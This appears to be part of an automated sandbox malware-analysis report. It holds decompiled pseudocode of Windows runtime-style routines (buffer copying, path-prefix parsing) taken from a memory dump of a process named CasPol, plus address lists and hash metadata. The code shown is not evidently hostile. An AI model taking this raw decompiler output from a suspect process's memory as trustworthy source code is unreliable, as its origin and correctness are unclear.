			*((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
			_t427 = 0;
			__eflags = 0;
			_t511 = 0x18;
			goto L91;
		} else {
			_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
			__eflags = _t519;
			*(_t528 - 0x8c) = _t328;
			do {
				_t506 =  *((intOrPtr*)(_t519 - 4));
				_t457 =  *((intOrPtr*)(_t519 - 0xc));
				*(_t528 - 0xd4) =  *(_t519 - 8);
				_t333 =  *((intOrPtr*)(_t528 - 0xb4));
				__eflags =  *(_t333 + 0x36) & 0x00004000;
				if(( *(_t333 + 0x36) & 0x00004000) != 0) {
					_t334 =  *_t519;
				} else {
					_t334 = 0;
				}
				_t336 = _t334 & 0x000000ff;
				__eflags = _t336;
				_t427 =  *(_t528 - 0x88);
				if(_t336 == 0) {
					_t481 = _t479 + _t506;
					__eflags = _t481;
					*(_t528 - 0x78) = _t481;
					E0176F3E0(_t479 + _t427, _t457, _t506);
					_t529 = _t529 + 0xc;
				} else {
					_t340 = _t336 - 1;
					__eflags = _t340;
					if(_t340 == 0) {
						E0176F3E0( *(_t528 - 0xb8), _t457, _t506);
						_t529 = _t529 + 0xc;
						*(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
					} else {
						__eflags = _t340 == 0;
						if(_t340 == 0) {
							__eflags = _t506 - 8;
							if(_t506 == 8) {
								*((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
								*(_t528 - 0xdc) =  *(_t457 + 4);
							}
						}
					}
				}
				_t339 = 0x10;
				_t519 = _t519 + _t339;
				_t263 = _t528 - 0x8c;
				*_t263 =  *(_t528 - 0x8c) - 1;
				__eflags =  *_t263;
				_t479 =  *(_t528 - 0x78);
			} while ( *_t263 != 0);
			goto L87;
		}
	}
} else {
	_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
	*(_t528 - 0xa2) = _t392;
	_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
	__eflags = _t469;
	while(1) {
		*(_t528 - 0xe4) = _t511;
		__eflags = _t392;
		_t393 = _t427;
		if(_t392 != 0) {
			_t393 =  *((intOrPtr*)(_t469 + 4));
		}
		_t395 = (_t393 & 0x000000ff) - _t427;
		__eflags = _t395;
		if(_t395 == 0) {
			_t511 = _t511 +  *_t469;
			__eflags = _t511;
		} else {
			_t398 = _t395 - 1;
			__eflags = _t398;
			if(_t398 == 0) {
                                                                                                                                                                                                                                                                                                															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                                                                                                                                                                                                                                                                                															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                                                                                                                                                                                                                                                                                														} else {
                                                                                                                                                                                                                                                                                                															__eflags = _t398 == 1;
                                                                                                                                                                                                                                                                                                															if(_t398 == 1) {
                                                                                                                                                                                                                                                                                                																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                                                                                                                                                                                                                                                                                																_t402 =  *_t469 & 0x0000ffff;
                                                                                                                                                                                                                                                                                                																 *(_t528 - 0xac) = _t402;
                                                                                                                                                                                                                                                                                                																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                                                                                                                                                                                                                                                                															}
                                                                                                                                                                                                                                                                                                														}
                                                                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                                                                													__eflags = _t511 -  *(_t528 - 0xe4);
                                                                                                                                                                                                                                                                                                													if(_t511 <  *(_t528 - 0xe4)) {
                                                                                                                                                                                                                                                                                                														break;
                                                                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                                                                													_t397 =  *(_t528 - 0x88) + 1;
                                                                                                                                                                                                                                                                                                													 *(_t528 - 0x88) = _t397;
                                                                                                                                                                                                                                                                                                													_t469 = _t469 + 0x10;
                                                                                                                                                                                                                                                                                                													__eflags = _t397 -  *(_t528 + 0x1c);
                                                                                                                                                                                                                                                                                                													_t392 =  *(_t528 - 0xa2);
                                                                                                                                                                                                                                                                                                													if(_t397 <  *(_t528 + 0x1c)) {
                                                                                                                                                                                                                                                                                                														continue;
                                                                                                                                                                                                                                                                                                													}
                                                                                                                                                                                                                                                                                                													goto L45;
                                                                                                                                                                                                                                                                                                												}
                                                                                                                                                                                                                                                                                                												_t475 = 0x216;
                                                                                                                                                                                                                                                                                                												 *(_t528 - 0x74) = 0x216;
                                                                                                                                                                                                                                                                                                												goto L45;
                                                                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                                                                											asm("lock dec dword [eax+ecx*8+0x4]");
                                                                                                                                                                                                                                                                                                											goto L16;
                                                                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                                                                									_t491 = L017F4CAB(_t306, _t528 - 0xa4);
                                                                                                                                                                                                                                                                                                									 *(_t528 - 0x74) = _t491;
                                                                                                                                                                                                                                                                                                									__eflags = _t491;
                                                                                                                                                                                                                                                                                                									if(_t491 != 0) {
                                                                                                                                                                                                                                                                                                										goto L91;
                                                                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                                                                										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                                                                                                                                                                                                                                										goto L20;
                                                                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                								L16:
                                                                                                                                                                                                                                                                                                								 *(_t528 - 0x74) = 0x1069;
                                                                                                                                                                                                                                                                                                								L93:
                                                                                                                                                                                                                                                                                                								_t298 =  *(_t528 - 0xd0) + 1;
                                                                                                                                                                                                                                                                                                								 *(_t528 - 0xd0) = _t298;
                                                                                                                                                                                                                                                                                                								_t474 = _t474 + _t511;
                                                                                                                                                                                                                                                                                                								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                                                                                                                                                                                                                                                                								_t494 = 4;
                                                                                                                                                                                                                                                                                                								__eflags = _t298 - _t494;
                                                                                                                                                                                                                                                                                                								if(_t298 >= _t494) {
                                                                                                                                                                                                                                                                                                									goto L100;
                                                                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                                                                								_t494 =  *(_t528 - 0xcc);
                                                                                                                                                                                                                                                                                                								_t435 = _t298;
                                                                                                                                                                                                                                                                                                								continue;
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							__eflags = _t494[2] | _t494[3];
                                                                                                                                                                                                                                                                                                							if((_t494[2] | _t494[3]) == 0) {
                                                                                                                                                                                                                                                                                                								goto L15;
                                                                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                                                                							goto L12;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						__eflags = _t301;
                                                                                                                                                                                                                                                                                                						if(_t301 != 0) {
                                                                                                                                                                                                                                                                                                							goto L92;
                                                                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                                                                                                                						L92:
                                                                                                                                                                                                                                                                                                						goto L93;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					_push(0x57);
                                                                                                                                                                                                                                                                                                					L101:
                                                                                                                                                                                                                                                                                                					return E0177D130(_t427, _t494, _t511);
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                			}










































































                                                                                                                                                                                                                                                                                                0x017f5c25
                                                                                                                                                                                                                                                                                                0x017f5c2a
                                                                                                                                                                                                                                                                                                0x017f5c2c
                                                                                                                                                                                                                                                                                                0x017f5c32
                                                                                                                                                                                                                                                                                                0x017f5c3a
                                                                                                                                                                                                                                                                                                0x017f5c3f
                                                                                                                                                                                                                                                                                                0x017f5c42
                                                                                                                                                                                                                                                                                                0x017f5c48
                                                                                                                                                                                                                                                                                                0x017f5c5b
                                                                                                                                                                                                                                                                                                0x017f5c5b
                                                                                                                                                                                                                                                                                                0x017f5c2c
                                                                                                                                                                                                                                                                                                0x017f5cb7
                                                                                                                                                                                                                                                                                                0x017f5cb9
                                                                                                                                                                                                                                                                                                0x017f5cbf
                                                                                                                                                                                                                                                                                                0x017f5cc2
                                                                                                                                                                                                                                                                                                0x017f5cca
                                                                                                                                                                                                                                                                                                0x017f5ccb
                                                                                                                                                                                                                                                                                                0x017f5ccb
                                                                                                                                                                                                                                                                                                0x017f5cd1
                                                                                                                                                                                                                                                                                                0x017f5cd7
                                                                                                                                                                                                                                                                                                0x017f5cda
                                                                                                                                                                                                                                                                                                0x017f5ce1
                                                                                                                                                                                                                                                                                                0x017f5ce4
                                                                                                                                                                                                                                                                                                0x017f5ce7
                                                                                                                                                                                                                                                                                                0x017f5ced
                                                                                                                                                                                                                                                                                                0x017f5cf3
                                                                                                                                                                                                                                                                                                0x017f5cf9
                                                                                                                                                                                                                                                                                                0x017f5cff
                                                                                                                                                                                                                                                                                                0x017f5d08
                                                                                                                                                                                                                                                                                                0x017f5d0a
                                                                                                                                                                                                                                                                                                0x017f5d0e
                                                                                                                                                                                                                                                                                                0x017f5d10
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f5d16
                                                                                                                                                                                                                                                                                                0x017f5d1a
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f5d20
                                                                                                                                                                                                                                                                                                0x017f5d22
                                                                                                                                                                                                                                                                                                0x017f5d25
                                                                                                                                                                                                                                                                                                0x017f5d2f
                                                                                                                                                                                                                                                                                                0x017f5d2f
                                                                                                                                                                                                                                                                                                0x017f5d33
                                                                                                                                                                                                                                                                                                0x017f5d3d
                                                                                                                                                                                                                                                                                                0x017f5d49
                                                                                                                                                                                                                                                                                                0x017f5d4b
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f5d5a
                                                                                                                                                                                                                                                                                                0x017f5d5d
                                                                                                                                                                                                                                                                                                0x017f5d60
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f5d66
                                                                                                                                                                                                                                                                                                0x017f5d69
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f5d6f
                                                                                                                                                                                                                                                                                                0x017f5d6f
                                                                                                                                                                                                                                                                                                0x017f5d73
                                                                                                                                                                                                                                                                                                0x017f5d79
                                                                                                                                                                                                                                                                                                0x017f5d7f
                                                                                                                                                                                                                                                                                                0x017f5d86
                                                                                                                                                                                                                                                                                                0x017f5d95
                                                                                                                                                                                                                                                                                                0x017f5d98
                                                                                                                                                                                                                                                                                                0x017f5dba
                                                                                                                                                                                                                                                                                                0x017f5dcb
                                                                                                                                                                                                                                                                                                0x017f5dce
                                                                                                                                                                                                                                                                                                0x017f5dd3
                                                                                                                                                                                                                                                                                                0x017f5dd6
                                                                                                                                                                                                                                                                                                0x017f5dd8
                                                                                                                                                                                                                                                                                                0x017f5de6
                                                                                                                                                                                                                                                                                                0x017f5dec
                                                                                                                                                                                                                                                                                                0x017f5dee
                                                                                                                                                                                                                                                                                                0x017f5df1
                                                                                                                                                                                                                                                                                                0x017f5df3
                                                                                                                                                                                                                                                                                                0x017f635a
                                                                                                                                                                                                                                                                                                0x017f635a
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f635a
                                                                                                                                                                                                                                                                                                0x017f5dfe
                                                                                                                                                                                                                                                                                                0x017f5e02
                                                                                                                                                                                                                                                                                                0x017f5e05
                                                                                                                                                                                                                                                                                                0x017f5e07
                                                                                                                                                                                                                                                                                                0x017f5e10
                                                                                                                                                                                                                                                                                                0x017f5e13
                                                                                                                                                                                                                                                                                                0x017f5e1b
                                                                                                                                                                                                                                                                                                0x017f5e1c
                                                                                                                                                                                                                                                                                                0x017f5e21
                                                                                                                                                                                                                                                                                                0x017f5e22
                                                                                                                                                                                                                                                                                                0x017f5e23
                                                                                                                                                                                                                                                                                                0x017f5e25
                                                                                                                                                                                                                                                                                                0x017f5e2a
                                                                                                                                                                                                                                                                                                0x017f60a4
                                                                                                                                                                                                                                                                                                0x017f60ae
                                                                                                                                                                                                                                                                                                0x017f60b0
                                                                                                                                                                                                                                                                                                0x017f60b3
                                                                                                                                                                                                                                                                                                0x017f60b6
                                                                                                                                                                                                                                                                                                0x017f60b8
                                                                                                                                                                                                                                                                                                0x017f60ba
                                                                                                                                                                                                                                                                                                0x017f60ba
                                                                                                                                                                                                                                                                                                0x017f60ba
                                                                                                                                                                                                                                                                                                0x017f60ba
                                                                                                                                                                                                                                                                                                0x017f60be
                                                                                                                                                                                                                                                                                                0x017f60c0
                                                                                                                                                                                                                                                                                                0x017f60c5
                                                                                                                                                                                                                                                                                                0x017f60c5
                                                                                                                                                                                                                                                                                                0x017f60c5
                                                                                                                                                                                                                                                                                                0x017f60c6
                                                                                                                                                                                                                                                                                                0x017f60cd
                                                                                                                                                                                                                                                                                                0x017f6114
                                                                                                                                                                                                                                                                                                0x017f60cf
                                                                                                                                                                                                                                                                                                0x017f60cf
                                                                                                                                                                                                                                                                                                0x017f60d4
                                                                                                                                                                                                                                                                                                0x017f60d5
                                                                                                                                                                                                                                                                                                0x017f60da
                                                                                                                                                                                                                                                                                                0x017f60db
                                                                                                                                                                                                                                                                                                0x017f60e1
                                                                                                                                                                                                                                                                                                0x017f60e2
                                                                                                                                                                                                                                                                                                0x017f60e8
                                                                                                                                                                                                                                                                                                0x017f60f8
                                                                                                                                                                                                                                                                                                0x017f60fd
                                                                                                                                                                                                                                                                                                0x017f60fe
                                                                                                                                                                                                                                                                                                0x017f6102
                                                                                                                                                                                                                                                                                                0x017f6104
                                                                                                                                                                                                                                                                                                0x017f6107
                                                                                                                                                                                                                                                                                                0x017f6109
                                                                                                                                                                                                                                                                                                0x017f610b
                                                                                                                                                                                                                                                                                                0x017f610b
                                                                                                                                                                                                                                                                                                0x017f610b
                                                                                                                                                                                                                                                                                                0x017f610b
                                                                                                                                                                                                                                                                                                0x017f610f
                                                                                                                                                                                                                                                                                                0x017f610f
                                                                                                                                                                                                                                                                                                0x017f6117
                                                                                                                                                                                                                                                                                                0x017f611a
                                                                                                                                                                                                                                                                                                0x017f611f
                                                                                                                                                                                                                                                                                                0x017f6125
                                                                                                                                                                                                                                                                                                0x017f6134
                                                                                                                                                                                                                                                                                                0x017f6139
                                                                                                                                                                                                                                                                                                0x017f613f
                                                                                                                                                                                                                                                                                                0x017f6146
                                                                                                                                                                                                                                                                                                0x017f6148
                                                                                                                                                                                                                                                                                                0x017f614b
                                                                                                                                                                                                                                                                                                0x017f614d
                                                                                                                                                                                                                                                                                                0x017f614f
                                                                                                                                                                                                                                                                                                0x017f614f
                                                                                                                                                                                                                                                                                                0x017f614f
                                                                                                                                                                                                                                                                                                0x017f614f
                                                                                                                                                                                                                                                                                                0x017f6153
                                                                                                                                                                                                                                                                                                0x017f6159
                                                                                                                                                                                                                                                                                                0x017f6159
                                                                                                                                                                                                                                                                                                0x017f615c
                                                                                                                                                                                                                                                                                                0x017f6163
                                                                                                                                                                                                                                                                                                0x017f6169
                                                                                                                                                                                                                                                                                                0x017f616c
                                                                                                                                                                                                                                                                                                0x017f6172
                                                                                                                                                                                                                                                                                                0x017f6181
                                                                                                                                                                                                                                                                                                0x017f6186
                                                                                                                                                                                                                                                                                                0x017f6187
                                                                                                                                                                                                                                                                                                0x017f618b
                                                                                                                                                                                                                                                                                                0x017f6191
                                                                                                                                                                                                                                                                                                0x017f6195
                                                                                                                                                                                                                                                                                                0x017f61a3
                                                                                                                                                                                                                                                                                                0x017f61bb
                                                                                                                                                                                                                                                                                                0x017f61c0
                                                                                                                                                                                                                                                                                                0x017f61c3
                                                                                                                                                                                                                                                                                                0x017f61cc
                                                                                                                                                                                                                                                                                                0x017f61d0
                                                                                                                                                                                                                                                                                                0x017f61dc
                                                                                                                                                                                                                                                                                                0x017f61de
                                                                                                                                                                                                                                                                                                0x017f61e1
                                                                                                                                                                                                                                                                                                0x017f61e4
                                                                                                                                                                                                                                                                                                0x017f61e6
                                                                                                                                                                                                                                                                                                0x017f61e8
                                                                                                                                                                                                                                                                                                0x017f61e8
                                                                                                                                                                                                                                                                                                0x017f61e8
                                                                                                                                                                                                                                                                                                0x017f61e8
                                                                                                                                                                                                                                                                                                0x017f61e6
                                                                                                                                                                                                                                                                                                0x017f61ec
                                                                                                                                                                                                                                                                                                0x017f61f3
                                                                                                                                                                                                                                                                                                0x017f6203
                                                                                                                                                                                                                                                                                                0x017f6209
                                                                                                                                                                                                                                                                                                0x017f620a
                                                                                                                                                                                                                                                                                                0x017f6216
                                                                                                                                                                                                                                                                                                0x017f621d
                                                                                                                                                                                                                                                                                                0x017f6227
                                                                                                                                                                                                                                                                                                0x017f6241
                                                                                                                                                                                                                                                                                                0x017f5f28
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f5f30
                                                                                                                                                                                                                                                                                                0x017f5f31
                                                                                                                                                                                                                                                                                                0x017f5f37
                                                                                                                                                                                                                                                                                                0x017f5f3a
                                                                                                                                                                                                                                                                                                0x017f5f3d
                                                                                                                                                                                                                                                                                                0x017f5f44
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f5f46
                                                                                                                                                                                                                                                                                                0x017f5f48
                                                                                                                                                                                                                                                                                                0x017f5f4d
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f5f4d
                                                                                                                                                                                                                                                                                                0x017f5dda
                                                                                                                                                                                                                                                                                                0x017f5ddf
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f5ddf
                                                                                                                                                                                                                                                                                                0x017f5dd8
                                                                                                                                                                                                                                                                                                0x017f5da7
                                                                                                                                                                                                                                                                                                0x017f5da9
                                                                                                                                                                                                                                                                                                0x017f5dac
                                                                                                                                                                                                                                                                                                0x017f5dae
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f5db4
                                                                                                                                                                                                                                                                                                0x017f5db4
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f5db4
                                                                                                                                                                                                                                                                                                0x017f5dae
                                                                                                                                                                                                                                                                                                0x017f5d88
                                                                                                                                                                                                                                                                                                0x017f5d8d
                                                                                                                                                                                                                                                                                                0x017f6363
                                                                                                                                                                                                                                                                                                0x017f6369
                                                                                                                                                                                                                                                                                                0x017f636a
                                                                                                                                                                                                                                                                                                0x017f6370
                                                                                                                                                                                                                                                                                                0x017f6372
                                                                                                                                                                                                                                                                                                0x017f637a
                                                                                                                                                                                                                                                                                                0x017f637b
                                                                                                                                                                                                                                                                                                0x017f637d
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f637f
                                                                                                                                                                                                                                                                                                0x017f6385
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f6385
                                                                                                                                                                                                                                                                                                0x017f5d38
                                                                                                                                                                                                                                                                                                0x017f5d3b
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f5d3b
                                                                                                                                                                                                                                                                                                0x017f5d27
                                                                                                                                                                                                                                                                                                0x017f5d29
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f6360
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017f6360
                                                                                                                                                                                                                                                                                                0x017f5c10
                                                                                                                                                                                                                                                                                                0x017f5c10
                                                                                                                                                                                                                                                                                                0x017f63da
                                                                                                                                                                                                                                                                                                0x017f63e5
                                                                                                                                                                                                                                                                                                0x017f63e5

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 0946c7b5d0db12d450ab563019a12a348f971a72264825dc3b3ca05bc37b3e1c
                                                                                                                                                                                                                                                                                                • Instruction ID: 4665f801f2f3257bd47584552e8f72417374d22a58b6919e8c43e12fa0945b4d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0946c7b5d0db12d450ab563019a12a348f971a72264825dc3b3ca05bc37b3e1c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E422B75910219CFDB24CF68C880BAAFBB1FF45304F1581AEEA49AB342D7759A85CF50
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                                			E01744120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                                                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                                                                				void* _v20;
                                                                                                                                                                                                                                                                                                				signed int _v24;
                                                                                                                                                                                                                                                                                                				char _v532;
                                                                                                                                                                                                                                                                                                				char _v540;
                                                                                                                                                                                                                                                                                                				signed short _v544;
                                                                                                                                                                                                                                                                                                				signed int _v548;
                                                                                                                                                                                                                                                                                                				signed short* _v552;
                                                                                                                                                                                                                                                                                                				signed short _v556;
                                                                                                                                                                                                                                                                                                				signed short* _v560;
                                                                                                                                                                                                                                                                                                				signed short* _v564;
                                                                                                                                                                                                                                                                                                				signed short* _v568;
                                                                                                                                                                                                                                                                                                				void* _v570;
                                                                                                                                                                                                                                                                                                				signed short* _v572;
                                                                                                                                                                                                                                                                                                				signed short _v576;
                                                                                                                                                                                                                                                                                                				signed int _v580;
                                                                                                                                                                                                                                                                                                				char _v581;
                                                                                                                                                                                                                                                                                                				void* _v584;
                                                                                                                                                                                                                                                                                                				unsigned int _v588;
                                                                                                                                                                                                                                                                                                				signed short* _v592;
                                                                                                                                                                                                                                                                                                				void* _v597;
                                                                                                                                                                                                                                                                                                				void* _v600;
                                                                                                                                                                                                                                                                                                				void* _v604;
                                                                                                                                                                                                                                                                                                				void* _v609;
                                                                                                                                                                                                                                                                                                				void* _v616;
                                                                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                                                                				unsigned int _t161;
                                                                                                                                                                                                                                                                                                				signed int _t162;
                                                                                                                                                                                                                                                                                                				unsigned int _t163;
                                                                                                                                                                                                                                                                                                				void* _t169;
                                                                                                                                                                                                                                                                                                				signed short _t173;
                                                                                                                                                                                                                                                                                                				signed short _t177;
                                                                                                                                                                                                                                                                                                				signed short _t181;
                                                                                                                                                                                                                                                                                                				unsigned int _t182;
                                                                                                                                                                                                                                                                                                				signed int _t185;
                                                                                                                                                                                                                                                                                                				signed int _t213;
                                                                                                                                                                                                                                                                                                				signed int _t225;
                                                                                                                                                                                                                                                                                                				short _t233;
                                                                                                                                                                                                                                                                                                				signed char _t234;
                                                                                                                                                                                                                                                                                                				signed int _t242;
                                                                                                                                                                                                                                                                                                				signed int _t243;
                                                                                                                                                                                                                                                                                                				signed int _t244;
                                                                                                                                                                                                                                                                                                				signed int _t245;
                                                                                                                                                                                                                                                                                                				signed int _t250;
                                                                                                                                                                                                                                                                                                				void* _t251;
                                                                                                                                                                                                                                                                                                				signed short* _t254;
                                                                                                                                                                                                                                                                                                				void* _t255;
                                                                                                                                                                                                                                                                                                				signed int _t256;
                                                                                                                                                                                                                                                                                                				void* _t257;
                                                                                                                                                                                                                                                                                                				signed short* _t260;
                                                                                                                                                                                                                                                                                                				signed short _t265;
                                                                                                                                                                                                                                                                                                				signed short* _t269;
                                                                                                                                                                                                                                                                                                				signed short _t271;
                                                                                                                                                                                                                                                                                                				signed short** _t272;
                                                                                                                                                                                                                                                                                                				signed short* _t275;
                                                                                                                                                                                                                                                                                                				signed short _t282;
                                                                                                                                                                                                                                                                                                				signed short _t283;
                                                                                                                                                                                                                                                                                                				signed short _t290;
                                                                                                                                                                                                                                                                                                				signed short _t299;
                                                                                                                                                                                                                                                                                                				signed short _t307;
                                                                                                                                                                                                                                                                                                				signed int _t308;
                                                                                                                                                                                                                                                                                                				signed short _t311;
                                                                                                                                                                                                                                                                                                				signed short* _t315;
                                                                                                                                                                                                                                                                                                				signed short _t316;
                                                                                                                                                                                                                                                                                                				void* _t317;
                                                                                                                                                                                                                                                                                                				void* _t319;
                                                                                                                                                                                                                                                                                                				signed short* _t321;
                                                                                                                                                                                                                                                                                                				void* _t322;
                                                                                                                                                                                                                                                                                                				void* _t323;
                                                                                                                                                                                                                                                                                                				unsigned int _t324;
                                                                                                                                                                                                                                                                                                				signed int _t325;
                                                                                                                                                                                                                                                                                                				void* _t326;
                                                                                                                                                                                                                                                                                                				signed int _t327;
                                                                                                                                                                                                                                                                                                				signed int _t329;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                                                                                                                                                                                                                                                                                				_v8 =  *0x181d360 ^ _t329;
                                                                                                                                                                                                                                                                                                				_t157 = _a8;
                                                                                                                                                                                                                                                                                                				_t321 = _a4;
                                                                                                                                                                                                                                                                                                				_t315 = __edx;
                                                                                                                                                                                                                                                                                                				_v548 = __ecx;
                                                                                                                                                                                                                                                                                                				_t305 = _a20;
                                                                                                                                                                                                                                                                                                				_v560 = _a12;
                                                                                                                                                                                                                                                                                                				_t260 = _a16;
                                                                                                                                                                                                                                                                                                				_v564 = __edx;
                                                                                                                                                                                                                                                                                                				_v580 = _a8;
                                                                                                                                                                                                                                                                                                				_v572 = _t260;
                                                                                                                                                                                                                                                                                                				_v544 = _a20;
                                                                                                                                                                                                                                                                                                				if( *__edx <= 8) {
                                                                                                                                                                                                                                                                                                					L3:
                                                                                                                                                                                                                                                                                                					if(_t260 != 0) {
                                                                                                                                                                                                                                                                                                						 *_t260 = 0;
                                                                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                                                                					_t254 =  &_v532;
                                                                                                                                                                                                                                                                                                					_v588 = 0x208;
                                                                                                                                                                                                                                                                                                					if((_v548 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                                						_v556 =  *_t315;
                                                                                                                                                                                                                                                                                                						_v552 = _t315[2];
                                                                                                                                                                                                                                                                                                						_t161 = E0175F232( &_v556);
                                                                                                                                                                                                                                                                                                						_t316 = _v556;
                                                                                                                                                                                                                                                                                                						_v540 = _t161;
                                                                                                                                                                                                                                                                                                						goto L17;
                                                                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                                                                						_t306 = 0x208;
                                                                                                                                                                                                                                                                                                						_t298 = _t315;
                                                                                                                                                                                                                                                                                                						_t316 = L01746E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                                                                                                                                                                                                                                                                                						if(_t316 == 0) {
                                                                                                                                                                                                                                                                                                							L68:
                                                                                                                                                                                                                                                                                                							_t322 = 0xc0000033;
                                                                                                                                                                                                                                                                                                							goto L39;
                                                                                                                                                                                                                                                                                                						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01744620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = L01746E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
